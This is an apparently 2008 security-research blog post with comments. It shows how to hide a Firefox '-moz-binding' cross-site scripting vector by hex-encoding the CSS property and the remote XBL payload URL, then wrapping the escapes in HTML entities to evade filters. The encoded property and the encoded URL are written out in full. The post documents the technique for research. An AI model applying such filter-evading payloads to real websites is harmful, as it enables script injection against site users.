Skip to content

Moz-binding XSS fun

CSS supports hex encoding within styles as well html entities, but did you know you could combine them both? I didn’t. To construct an attack similar to the one displayed below you first need to convert your CSS property to hex, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67, notice there is no “x” prefix or double zeros like you would see in HTML entities or Unicode Javascript. The link contains a Hackvertor URL to help you with the conversion.

You can do the same conversion on the value of the property, so the url of the moz-binding payload: //businessinfo.co.uk/labs/xbl/xbl.xml#xss becomes : \2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62
\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73

I hope you’re following so far, we can now take the property string and encode it further, crazy eh? Any part of the property can now be encoded with html entities. I went for the backslash and malformed entities but you can experiment with different combinations. The property “\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67″ now becomes: &#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&
#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67.

Here is the final vector with a link to hackvertor for testing:-
The final vector

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 6

  1. pdp wrote:

    interesting, I quickly checked the method in Firefox 3 and it doesn’t seem to work. I haven’t checked it in Firefox 2 though.

    Posted 04 Feb 2008 at 2:55 pm
  2. Gareth Heyes wrote:

    Yep only tested in Firefox 2, although other tricks may be possible with FF3, I might have a go at that some other time :)

    Posted 04 Feb 2008 at 3:21 pm
  3. Gareth Heyes wrote:

    Another thing I forgot to mention is that noscript silently disables moz-binding, so you have to disable noscript to test the vector.

    Posted 04 Feb 2008 at 3:24 pm
  4. riahmatic wrote:

    error console in FF3:
    Warning: Unknown property ‘尭屭屯屺尭屢屩屮層屩屮屧’. Declaration dropped.

    Though I think FF3 enforces SOP on -moz-binding now anyway, right?

    Posted 05 Feb 2008 at 4:07 am
  5. Gareth Heyes wrote:

    @riahmatic

    Yep that’s the expected behavior but FF2 seems to read the entities first and decode them but for some reason only takes into account the first few characters (maybe because it’s in a style).

    I’ve not looked at FF3 yet much but I’m sure to have plenty of fun when I do :) If FF3 does enforce SOP on moz-binding then that’s a good thing but I’ve not seen it mentioned anywhere.

    Posted 05 Feb 2008 at 9:26 am
  6. Vinicius K-Max wrote:

    awesome! :)

    Posted 06 Feb 2008 at 1:57 am

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam